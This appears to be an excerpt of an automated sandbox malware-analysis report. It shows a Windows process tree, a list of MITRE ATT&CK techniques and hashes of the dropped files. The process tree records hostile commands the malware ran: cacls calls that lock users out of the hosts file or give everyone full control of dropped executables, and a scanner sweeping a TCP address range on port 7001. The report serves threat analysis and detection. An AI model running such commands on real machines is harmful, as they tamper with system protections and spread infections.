C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 640 C:\Windows\TEMP\crwkenged\640.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\crwkenged\qecbgmeqc\scan.bat2⤵PID:1640
-
C:\Windows\crwkenged\qecbgmeqc\gabnkczie.exegabnkczie.exe TCP 194.110.0.1 194.110.255.255 7001 512 /save3⤵
- Executes dropped EXE
PID:3704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:5372
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5592
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:5276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5292
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:216
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3504
-
-
-
C:\Windows\SysWOW64\nslfoo.exeC:\Windows\SysWOW64\nslfoo.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2724
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\qfabize.exe1⤵PID:2056
-
C:\Windows\ime\qfabize.exeC:\Windows\ime\qfabize.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4892
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\kceeicrzi\kfcalc.exe /p everyone:F1⤵PID:2192
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3220
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\kceeicrzi\kfcalc.exe /p everyone:F2⤵PID:3772
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\mzqrhbdf\qfabize.exe /p everyone:F1⤵PID:1452
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:1556
-
-
C:\Windows\system32\cacls.execacls C:\Windows\mzqrhbdf\qfabize.exe /p everyone:F2⤵PID:5104
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
2.7MB
MD5841f90e0f14b2babec072d0666f30077
SHA1d180971196aa302e906bd44e60a82c3e4f2b44a7
SHA2567e2b8855fd9862b489515ecd7965e323a22fca2ba1fc57e240e582eeb693fce5
SHA5128821fedf6593b5ab5c2a857d768ab7783b9bb1032656eea59277a3ffab5b7a1fb2f527fdff5c0f42b63a3e33309c5b07c47ad528a9075c259d874b0a62b24009
-
Filesize
4.1MB
MD51498bb8fcc8d40008ec376ed71ebe1c9
SHA17fb51dbbd422d823d36af6e5f90d115496c4ca63
SHA25629a5d994ff9eb75f067572d9c64cf2b20891f5a47941741dad3f8472adeb2fd9
SHA5126cf77c06e59b20a49cd50f8f9714ea2bd948afd62d7525bf82e988430855b49418e1633b1048a01fab52591d80b8051aa2ea59d15be414113ae919f9aabb2cb5
-
Filesize
26.5MB
MD52450a1e18a67e6738e9e37ade4916d3f
SHA1895d81288aeebe17b725ee7e224f92ae8f018f1b
SHA2565c22a264049fef2cad23fda6cb1f2fc53b788e60a6730f2221b06e17b6fbf258
SHA512ee7a9002f5b067aa77e4922b6460f962ce19c2b48ffc97c6ed8e38555767f223ee7f694ace115b0ba0aaa6625e48278ea70229d4ef33d1f0157e740d05aa5fba
-
Filesize
3.8MB
MD5e5c7fd092d828c3e558df6f38065f47b
SHA1d151c61c8e425bbcbd1bf71c0833e52d81370b8a
SHA2565e33b33d18c9db1dc39740ff5961a4c65b207f2e6f050a5a0ec09368150e7980
SHA5122ef680510c4725ed3767182bfb3bfc943bdce6fca8c2fba01fa42305a41340605741d9409fd8a153488d16dddefecbba1b8d8509be2357eff35ea0e752d39589
-
Filesize
7.5MB
MD5217ef1ccc560e55cf7fb1ebc691c8328
SHA147bde93badbd9b39541b7765ddd2cca95997247a
SHA256fa741b73c65aa3e15fd162b0783d53fdd0683240ad5de2b5c7d740de1557ee9b
SHA5121a2911408be44c7944773e41a3b44603350f5373ca8ab389432298d8956ffdb653b9722c264bfc14f2bdf9e46a336384993b06b01d9164335f41564bff5d76c3
-
Filesize
3.0MB
MD587725a26242c68312764aee1122f9bcb
SHA152247c8f14780ae70940a672a96d3a05b86c16eb
SHA256adc627cb78995040db30219bc0d91d153f5ce2ae89e0f3c26f84a449fdd7266f
SHA512a6bd98364a59d76cb7196736702514c2694b0413c2edfa809d7715b495d34193f42f51757980df67efcfa8e399a845da868f9c4ccab53c605354f33c203f1a5a
-
Filesize
810KB
MD59d6c88322db4682267fd3a012d1465a7
SHA1e5f0c885dc05ae60c9f120f3ba036124362501fd
SHA256e2dad3a3b0d962bb5e7e205adcddf7a2070cb3a75113dbc932114a8bc45a124c
SHA512204905eb8b2b5f4eb112bd4ec28b0c5333bec73caed06c797583b466e4c1d1a4d13f1cc84e7eebf48d92e834ab2c14343a6e19d22d4c005d9f2427df52d52d7d
-
Filesize
8.4MB
MD519669b9a8661057e64d9a69554fe2690
SHA1b1c47c02dad9582492c852da1188a2e5c914843b
SHA2561e8bb58fedbef47b575553c0be042047bd6e7d3d44dec7054dd0072b046fd112
SHA5121a4c94c90caa2f66c0e1d30d15fac3bc7e1d789c8dad5235c28cc24bee9148e0b5d2f2920bada9d29dae131da242f84a77e53693e80a422e0b408ccc988fbe83
-
Filesize
2.7MB
MD5bec4109e7c51f28cf95cc6e4a6011a31
SHA15c73a75341c07fe1fd92e827ccf6c2c5eaff5ae6
SHA256ef60a44b62fc020cbcb0fc52a52a1cc1a015881aceb3cacf8c5c15a86a35f55e
SHA5124e1a113c5206ece942d506c3c78a79f91df159ebcf23762ef5f5b34af2b722bb85c7ca395cad55ed0070d99b25193ba086a0d4830eb11e5abec562b5dc1534ee
-
Filesize
20.6MB
MD593a7c69fe46d7ff702e3a82b5997b555
SHA176c1d9a84d41f219bb97bbb66e5cb135d48ecb1a
SHA2569859eec004d3895407e2eaa9c565f13da28197511522524f14bdeebbd16295e2
SHA51298f73dd28316eda83a34b2c0e95ee0027d383ee8560a55037f9690e0ed3cc9293118ffe065f8e5b608021ee0be31c27520305183e5f2e7c601bb44f5127e4260
-
Filesize
5.0MB
MD582ce6e0f35b36127bee54c0cf037bc81
SHA19983f2e902bc1d8a2202f433ceff4e9bfded877c
SHA2566b743e01a3c46a916f50227659d99ca054b3bccd2307945b4116d6f1ffcb0588
SHA512833cb4788f5ecd996c41d096882429547757a792981c859ae918798774479e1b4a9e28293d19f5d199879b2dd67746a21d4231410a13e1c17d97a39bac604663
-
Filesize
43.9MB
MD561aacdb3d67b5aab57ce7203666440d4
SHA16080ca4c0dc46a640153da91634205c2bba92339
SHA256c3bbcc1a19fe80a59e901d2963cd21350bc8db2909006ba5cf7c7a98095213ea
SHA512761bf602f3baad60055ba467d362236fa246bbdee2d0858c79942c5a9fbaec34b83547c08657cfd13c134d99cc62c772a512e8031171e056c18b28762990bab6
-
Filesize
1.2MB
MD5adca21191f3a9a0685a2ceb373f7c012
SHA1251a4cbdf6efdb47ef18c54fb4470ae901414ecb
SHA256e8c3472a3958fb1b45883d1d3cf6302b448fc2680031bc01d58cec1c735c8e29
SHA512423c581994aa45d1d413c07250c91f56051f55227ec93812a3afc0a4365c6ab85c624d8b78bfe0a0ba0e648da5c53515bc8477d89173b5f9bd86fc4836217be3
-
Filesize
33.6MB
MD5c6e00128876f429b14f01fdc7307374b
SHA16166321cc457a19f8643bc64d77c0fb45410433f
SHA256db46200fad2b9fe7d512c4d587a0d7c4630f9b7ecef8bf3a3458ddb37ce8bbdd
SHA5128c498703f583231ee11dba3943fac79aebf2f5eb9f1d5a7fa7657b2c7a8822b12ce421b0fa6e50c23b13a621bd21c9e9b0bfea940f06c4ac961bc82bac4f333b
-
Filesize
1011KB
MD5a9f5ae29168653b65f0795be877fa510
SHA1c06b7bbfb6b1465f50c93fce2be5721a1215b459
SHA256612569c9408af34ddf77c8070f9e8178e98b052fac5db42c8f8ca5ed3a150a78
SHA512d76cd6bf50c345255481c53bb936a6a15ccfeb9cd6b5b3431654cf634c9eda9bc4f64e754e516e9a5289d8dad3849b61c42fcb69cc41dbf36bc718fded8f3aa2
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
8.0MB
MD572e06c115993d276edb1a972ac8c5eb7
SHA194872c1ea042b70a35af4f557949af28db08bbc8
SHA256070842fca0aed2c333f9664c591df435d3740449596cb61a47dafb05b67b5f67
SHA512d833629b82cf5c60a42181bd8f39ebd8539f0c373f77957ce598c63d89998dbdbf139218c33cebf4bcbab15201832ce44f16548fd0176b3a2403b06bde7e39ac
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376